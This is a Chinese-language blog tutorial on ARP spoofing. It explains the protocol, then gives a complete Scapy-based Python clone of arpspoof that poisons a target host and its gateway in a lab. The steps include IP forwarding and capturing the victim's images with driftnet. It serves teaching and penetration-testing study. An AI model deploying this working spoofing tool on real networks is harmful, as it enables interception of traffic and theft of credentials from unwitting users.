Python黑帽编程 3.1 ARP欺骗

简介:

Python灰帽编程 3.1 ARP欺骗

ARP欺骗是一种在局域网中常用的攻击手段,目的是让局域网中指定的(或全部)的目标机器的数据包都通过攻击者主机进行转发,是实现中间人攻击的常用手段,从而实现数据监听、篡改、重放、钓鱼等攻击方式。

在进行ARP欺骗的编码实验之前,我们有必要了解下ARPARP欺骗的原理。

3.1.1 ARPARP欺骗原理

ARP是地址转换协议(Address Resolution Protocol)的英文缩写,它是一个链路层协议,工作在OSI 模型的第二层,在本层和硬件接口间进行联系,同时对上层(网络层)提供服务。我们知道二层的以太网交换设备并不能识别32位的IP地址,它们是以48位以太网地址(就是我们常说的MAC地址)传输以太网数据包的。也就是说IP数据包在局域网内部传输时并不是靠IP地址而是靠MAC地址来识别目标的,因此IP地址与MAC地址之间就必须存在一种对应关系,而ARP协议就是用来确定这种对应关系的协议。

ARP工作时,首先请求主机会发送出一个含有所希望到达的IP地址的以太网广播数据包,然后目标IP的所有者会以一个含有IPMAC地址对的数据包应答请求主机。这样请求主机就能获得要到达的IP地址对应的MAC地址,同时请求主机会将这个地址对放入自己的ARP表缓存起来,以节约不必要的ARP通信。ARP缓存表采用了老化机制,在一段时间内如果表中的某一行没有使用,就会被删除。

局域网上的一台主机,如果接收到一个ARP报文,即使该报文不是该主机所发送的ARP请求的应答报文,该主机也会将ARP报文中的发送者的MAC地址和IP地址更新或加入到ARP表中。

ARP欺骗攻击就利用了这点,攻击者主动发送ARP报文,发送者的MAC地址为攻击者主机的MAC地址,发送者的IP地址为被攻击主机的IP地址。通过不断发送这些伪造的ARP报文,让局域网上所有的主机和网关ARP表,其对应的MAC地址均为攻击者的MAC地址,这样所有的网络流量都会发送给攻击者主机。由于ARP欺骗攻击导致了主机和网关的ARP表的不正确,这种情况我们也称为ARP中毒。

根据ARP欺骗者与被欺骗者之间的角色关系的不同,通常可以把ARP欺骗攻击分为如下两种:

1.        主机型ARP欺骗:欺骗者主机冒充网关设备对其他主机进行欺骗

2.        网关型ARP欺骗:欺骗者主机冒充其他主机对网关设备进行欺骗

2

其实很多时候,我们都是进行双向欺骗,既欺骗主机又欺骗网关。

了解了基本原理之后,我们下面动手实现ARP欺骗程序。

3.1.2 基本网络信息

首先,我们来查看下当前虚拟机Kali Linux的网络配置和ARP缓存。

3

如图5所示,Kali Linux 以太网卡为eth0ip地址为192.168.1.102MAC地址为00:0c:29:6e:98:a6。下面我们再查看Kali LinuxARP缓存。

4

下面再用同样的方法查看Windows 系统的信息。

5

windows本身地址为192.168.1.18,同样缓存了路由器的地址。

下面我们将windows所在主机作为靶机,将Kali Linux所在虚拟机作为攻击机,进行编程测试。

3.1.3 构造ARP欺骗数据包

我们先完成第一个目标,告诉目标主机192.168.1.18网关的地址为Kali Linux所在主机的地址:192.168.1.102

在程序的顶部,我们先导入scapy

import sys

import time

from scapy.all import (

    get_if_hwaddr,

    getmacbyip,

    ARP,

    Ether,

    sendp

)

注意这里面的几个方法,get_if_hwaddr为获取本机网络接口的函数,getmacbyip是通过ip地址获取其Mac地址的方法,ARP是构建ARP数据包的类,Ether用来构建以太网数据包,sendp方法在第二层发送数据包。

我们先解下Ether的参数:

6

dst        : DestMACField              = (None)

src        : SourceMACField            = (None)

type       : XShortEnumField           = (36864)

构造一个以太网数据包通常需要指定目标和源MAC地址,如果不指定,默认发出的就是广播包,例如:

7

再来了解下ARP类构造函数的参数列表:

8

hwtype     : XShortField               = (1)

ptype      : XShortEnumField           = (2048)

hwlen      : ByteField                 = (6)

plen       : ByteField                 = (4)

op         : ShortEnumField            = (1)

hwsrc      : ARPSourceMACField         = (None)

psrc       : SourceIPField             = (None)

hwdst      : MACField                  = ('00:00:00:00:00:00')

pdst       : IPField                   = ('0.0.0.0')

构造ARP需要我们注意的有5个参数:

l  op。取值为1或者2,代表ARP请求或者响应包。

l  hwsrc。发送方Mac地址。

l  psrc。发送方IP地址。

l  hwdst。目标Mac地址。

l  pdst。目标IP地址。

定向欺骗

现在来构造数据包就很容易了,回到我们最初的目标,我们想告诉192.168.1.23这台主机网关地址为192.168.1.102所在的主机,构造的数据包应该是这样的:

pkt = Ether(src=[1.102MAC], dst=[1.18Mac]) / ARP(1.102MAC网关IP地址hwdst=1.18MAC, pdst=1.18IP地址op=2)

上面的代码我们不论是以太网数据包还是ARP数据包,我们都明确指定了来源和目标,在ARP数据包中,我们将Kali LinuxMac地址和网关的IP地址进行了绑定,op取值为2,作为一个响应包被1. 18接到,这样1. 18会更新自己的ARP缓存表,造成中毒,从而1. 18发往网关的数据包都会被发往1.102

那么我们如果要欺骗网关,把网关发往1.18的数据包都发送到Kali Linux1.102)上,根据上面的代码稍作修改即可:

pkt = Ether(src=[1.102MAC], dst=[网关的Mac]) / ARP(1.102MAC1. 18地址hwdst=网关MAC,pdst=网关IP地址op=2)

上面构造的两个数据包都是ARP响应包,其实发送请求包也可以进行毒化,请求包毒化的原理是,我们请求时候使用假的源IPMAC地址,目标主机同样会更新自己的路由表。

ARP请求的方式欺骗主机,构造的ARP包如下:

pkt = Ether(src=[1.102MAC], dst=[1. 18Mac]) / ARP(1.102MAC网关IP地址hwdst=1. 18MAC, pdst=1. 18IP地址op=1)

ARP请求的方式欺骗网关,构造的ARP包如下:

pkt = Ether(src=[1.102MAC], dst=[网关的Mac]) / ARP(1.102MAC1. 18地址hwdst=网关MAC,pdst=网关IP地址op=1)

我们看到构造ARP请求和响应的主要区别在op的值。

目前我们欺骗的方式都是一对一欺骗的,事实上我们可以发送广播包,对所有主机进行欺骗。

广播欺骗

广播欺骗,首先以太网数据包直接构造一个广播包,ARP包不用填写目标主机的信息即可。

下面是ARP广播响应包的构造方式:

pkt = Ether(src=mac, dst='ff:ff:ff:ff:ff:ff'/ ARP(hwsrc=mac, psrc=args[0], op=2)

最后综合定下和广播欺骗的方式,我们总结一个公式出来:

pkt = Ether(src=攻击机MAC, dst=被欺骗主机(或网关)MAC) / ARP((hwsrc=毒化记录中的MAC毒化记录中的IP, hwdst=被欺骗主机MAC, pdst=被欺骗主机IP地址op=1(或2)

概念有点绕,实践出真知。

3.1.4 发送数据包

数据包构造完成之后,我们要做的就是发送了,发送数据包这里我们使用sendp方法,该方法描述如下:

    Send packets at layer 2

    sendp(packets, [inter=0], [loop=0], [verbose=conf.verb]) -> None

sendp方法类似的还有一个send方法,两个方法不同的是,sendp方法工作在第二层,send方法工作在第三层。发送构造好的数据包就很简单了:

  sendp(pkt, inter=2iface=网卡)

3.1.5 打造你的ARPSPOOF

ARP欺骗的核心内容我们已经讲完了,在Kali Linux上有一款常用的ARP欺骗工具叫arpspoof

9

(关于arpspoof的使用可以参考我的视频教程《kali linux 渗透测试初级教程》,文末有获取方法。)

虽然我们不知道arpspoof的内部实现代码,但是我们完全可以根据目前掌握的知识,用Python来实现它。废话少说,先上代码:

#!/usr/bin/python

 

import os

import sys

import signal

 

from scapy.all import (

    get_if_hwaddr,

    getmacbyip,

    ARP,

    Ether,

    sendp

)

from optparse import OptionParser

 

def main():

    try:

        if os.geteuid() != 0:

            print "[-] Run me as root"

            sys.exit(1)

    except Exception,msg:

        print msg

 

    usage = 'Usage: %prog [-i interface] [-t target] host'

    parser = OptionParser(usage)

    parser.add_option('-i', dest='interface', help='Specify the interface to use')

    parser.add_option('-t', dest='target', help='Specify a particular host to ARP poison')

    parser.add_option('-m', dest='mode', default='req', help='Poisoning mode: requests (req) or replies (rep) [default: %default]')

    parser.add_option('-s', action='store_true', dest='summary', default=False, help='Show packet summary and ask for confirmation before poisoning')

    (options, args) = parser.parse_args()

 

    if len(args) != 1 or options.interface is None:

        parser.print_help()

        sys.exit(0)

 

    mac = get_if_hwaddr(options.interface)

 

    def build_req():

        if options.target is None:

            pkt = Ether(src=mac, dst='ff:ff:ff:ff:ff:ff') / ARP(hwsrc=mac, psrc=args[0], pdst=args[0])

        elif options.target:

            target_mac = getmacbyip(options.target)

            if target_mac is None:

                print "[-] Error: Could not resolve targets MAC address"

                sys.exit(1)

            pkt = Ether(src=mac, dst=target_mac) / ARP(hwsrc=mac, psrc=args[0], hwdst=target_mac, pdst=options.target)

 

        return pkt

 

    def build_rep():

        if options.target is None:

            pkt = Ether(src=mac, dst='ff:ff:ff:ff:ff:ff') / ARP(hwsrc=mac, psrc=args[0], op=2)

        elif options.target:

            target_mac = getmacbyip(options.target)

            if target_mac is None:

                print "[-] Error: Could not resolve targets MAC address"

                sys.exit(1)

            pkt = Ether(src=mac, dst=target_mac) / ARP(hwsrc=mac, psrc=args[0], hwdst=target_mac, pdst=options.target, op=2)

 

        return pkt

 

    if options.mode == 'req':

        pkt = build_req()

    elif options.mode == 'rep':

        pkt = build_rep()

 

    if options.summary is True:

        pkt.show()

        ans = raw_input('\n[*] Continue? [Y|n]: ').lower()

        if ans == 'y' or len(ans) == 0:

            pass

        else:

            sys.exit(0)

 

    while True:

        sendp(pkt, inter=2, iface=options.interface)

if __name__ == '__main__':

    main()

代码略微有一点多,不过核心内容没有离开我们上面讲到的内容,现在做个分解。

   usage = 'Usage: %prog [-i interface] [-t target] host'

    parser = OptionParser(usage)

    parser.add_option('-i', dest='interface', help='Specify the interface to use')

    parser.add_option('-t', dest='target', help='Specify a particular host to ARP poison')

    parser.add_option('-m', dest='mode', default='req', help='Poisoning mode: requests (req) or replies (rep) [default: %default]')

    parser.add_option('-s', action='store_true', dest='summary', default=False, help='Show packet summary and ask for confirmation before poisoning')

    (options, args) = parser.parse_args()

 

    if len(args) != 1 or options.interface is None:

        parser.print_help()

        sys.exit(0)

首先,我们引入了optparse模块,用来格式化用户输入的参数,如果用户输入参数不正确,会打印使用说明。

10

下面调用了get_if_hwaddr方法,根据参数中传入的网卡,获取本机MAC地址,该MAC地址在构建以太网和ARP数据包的时候做为攻击机的MAC地址被使用。

接下来是build_req方法,和build_rep方法,分别用来构建ARP请求和响应包。两个方法会检查是否指定了目标地址,如果没有就是广播欺骗,如果有就是定下欺骗。两个方法里面使用了getmacbyip方法来根据ip地址获取目标主机的MAC地址。构建数据包的原理我们上面讲的很清楚了,这里就不重复了。

再往下是根据输入的参数,判断应该构建的数据包类型,调用对应的方法。

if options.mode == 'req':

        pkt = build_req()

    elif options.mode == 'rep':

        pkt = build_rep()

 

    if options.summary is True:

        pkt.show()

        ans = raw_input('\n[*] Continue? [Y|n]: ').lower()

        if ans == 'y' or len(ans) == 0:

            pass

        else:

            sys.exit(0)

最后是发送数据包和程序的入口。

   while True:

        sendp(pkt, inter=2, iface=options.interface)

if __name__ == '__main__':

    main()

程序准备妥当,我们保存源码,下面开始测试。

3.1.6 测试

在做ARP欺骗测试的时候,一定要先开启本机的IP转发功能,否则会失败的。执行如下命令:

sysctl net.ipv4.ip_forward=1

11

下面我们打开终端,对192.168.1.18进行欺骗,告诉它网关为192.168.1.102所在的主机。

12

在打开一个终端,对网关进行欺骗,告诉网关,192.168.1.18对应的主机为192.168.1.102.

python arp1.py -i eth0 -t 192.168.1.1 192.168.1.18

一段时间之后,我们发现,192.168.1.18arp缓存发生了变化:

13

对比图13和图5我们知道arp毒化成功。下面我们来看一下能发捕获到1.18的外网请求信息,使用常用的测试工具driftnet

14

下面在1.18上随便打开几个带有图片的网页。

15

drifnet上面我们可以看到捕获的图片信息,如图16所示。

16

证明我们的arp欺骗程序编写成功。

3.1.7 在此基础上我们能做什么

上面的测试,我们知道基于ARP欺骗我们可以做数据监听,能拿到敏感信息,能拿到凭证进行重放攻击,能进行数据篡改,结合调用和DNS欺骗做很多事情。

关于进一步的实战利用,这里我就不展开了,在我的视频教程《Kali Linux web渗透测试基础教程》的第十四课《第14-arp欺骗、嗅探、dns欺骗、session劫持》讲了很多实用的工具,可以在ARP欺骗的基础上做很多测试。只要在玄魂工作室的微信订阅号(在下方扫码关注)下回复“kali”,会自动回复你免费获取整套教程的方法。

3.1.8 小结

本节比较详细的讲解了基于Scapy进行ARP数据包构建和发送的基础知识,综合这些基础进行ARP欺骗的工具编写,最终完成了一个可用的ARP欺骗工具。

下一节,基于本节的知识,我们编写一个ARP监控工具,来对网络上主机的ARP请求做动态的回应。

3.2节《ARP监控》已经在微信订阅号抢先发布,心急的同学进入订阅号(二维码在下方),从菜单专栏”—>”Python黑帽编程进入即可。

 

查看完整系列教程,请关注我的微信订阅号(xuanhun521,下方二维码),回复“python”。问题讨论请加qq群:Hacking 1群):303242737   Hacking 2群):147098303

 

玄魂工作室-精彩不断

 


本文转自玄魂博客园博客,原文链接:http://www.cnblogs.com/xuanhun/p/5802573.html,如需转载请自行联系原作者

目录
相关文章
|
3天前
|
安全 Python
Python 高级编程:高效读取 txt 文件的技巧与实践
在 Python 中,读取 txt 文件是常见操作。本文介绍了使用 `with` 语句自动管理文件资源、逐行读取文件、读取特定字节范围内容、处理编码问题以及使用缓冲读取提高性能等高级方法,确保代码高效且安全。通过这些技巧,你可以更灵活地处理文件内容,并避免资源泄漏等问题。原文链接:https://www.wodianping.com/app/2024-10/44183.html
33 18
|
3天前
|
缓存 Python
Python编程中的装饰器深度探索
本文深入探讨了Python中装饰器的高级用法,从基本定义到实际应用,展示了如何利用装饰器提升代码的灵活性和可维护性。通过具体示例,解析了装饰器在函数增强、日志记录、权限验证等方面的应用,旨在帮助读者彻底理解和掌握这一强大的编程工具。
|
1天前
|
数据处理 开发者 Python
Python 高级编程:深入解析 CSV 文件读取
在Python中,读取CSV文件是数据处理的重要环节。本文介绍了两种高效方法:一是利用pandas库的`read_csv`函数,将CSV文件快速转换为DataFrame对象,便于数据操作;二是通过csv模块的`csv.reader`按行读取CSV内容。此外,还涉及了如何选取特定列、解析日期格式、跳过指定行以及分块读取大文件等高级技巧,帮助开发者更灵活地处理各种CSV文件。参考链接:<https://www.wodianping.com/app/2024-10/48782.html>。
16 6
|
2天前
|
存储 UED Python
Python编程入门:打造你的第一个程序
【9月更文挑战第36天】在数字时代的浪潮中,编程已成为一项基础技能。本文以Python语言为例,通过构建一个简单的计算器程序,引领初学者步入编程的世界。从基础语法到实现功能,我们将一步步解锁编程的乐趣。无论你是编程新手还是想扩展知识边界的爱好者,这篇文章都将为你打开一扇通往编程世界的大门。让我们开始这段旅程,探索代码的魅力吧!
|
1天前
|
索引 Python
Python 高级编程:深入探索字符串切片
在Python中,字符串切片功能强大,可灵活提取特定部分。本文详细介绍切片技巧:基本切片、省略起始或结束索引、使用负数索引、设定步长及反转字符串等。此外,还介绍了如何结合其他操作进行切片处理,如先转换大小写再提取子串。 来源:https://www.wodianping.com/yeyou/2024-10/48238.html
11 4
|
2天前
|
Python
Python 脚本高级编程:从基础到实践
本文介绍了Python脚本的高级概念与示例,涵盖函数的灵活应用、异常处理技巧、装饰器的使用方法、上下文管理器的实现以及并发与并行编程技术,展示了Python在自动化任务和数据操作中的强大功能。包括复杂函数参数处理、自定义装饰器、上下文管理器及多线程执行示例。
25 5
|
2天前
|
人工智能 数据挖掘 开发者
探索Python编程的奥秘:从基础到高级
【9月更文挑战第36天】在这篇文章中,我们将一起踏上Python编程的奇妙之旅。无论你是初学者还是有一定经验的开发者,本文都将为你提供有价值的见解和技巧。我们将从Python的基础语法开始,逐步深入到面向对象编程、函数式编程等高级主题。通过本文的学习,你将能够更好地理解Python的强大之处,并掌握如何在实际项目中运用这些知识。让我们一起探索Python编程的奥秘吧!
14 3
|
1天前
|
程序员 BI 开发者
探索Python编程:从基础到实战
在数字时代的浪潮中,掌握编程技能已经成为一项宝贵的资产。Python,作为一种简洁而强大的编程语言,以其易学性和广泛的应用场景,成为了初学者和资深开发者的首选。本文将带你走进Python的世界,从零基础开始,逐步深入其核心概念,并最终通过一个实际项目来巩固所学知识。无论你是编程新手还是希望扩展技能的专业人士,这篇文章都将为你打开一扇通往编程世界的大门。让我们一起开始这段旅程,解锁Python编程的魅力吧!
|
3天前
|
机器学习/深度学习 存储 人工智能
Python 编程之旅:从基础到进阶
【9月更文挑战第35天】在这篇文章中,我们将一起探索 Python 编程的奇妙世界。无论你是初学者还是有一定经验的开发者,都能在这里找到有价值的内容。我们将从 Python 的基本语法开始,逐步深入到面向对象编程、函数式编程等高级主题。此外,我们还会介绍一些实用的库和框架,帮助你更高效地完成各种任务。让我们一起踏上这段激动人心的 Python 编程之旅吧!
|
2天前
|
设计模式 开发框架 测试技术
探索Python编程中的装饰器
【9月更文挑战第36天】在Python的世界里,装饰器是一个既神秘又强大的工具。它们不仅能够增强函数的功能,还能让代码更加简洁和模块化。本文将通过实例介绍装饰器的基本概念、使用方法以及如何自定义装饰器,旨在帮助读者掌握这一实用技术,从而提升代码的可读性和复用性。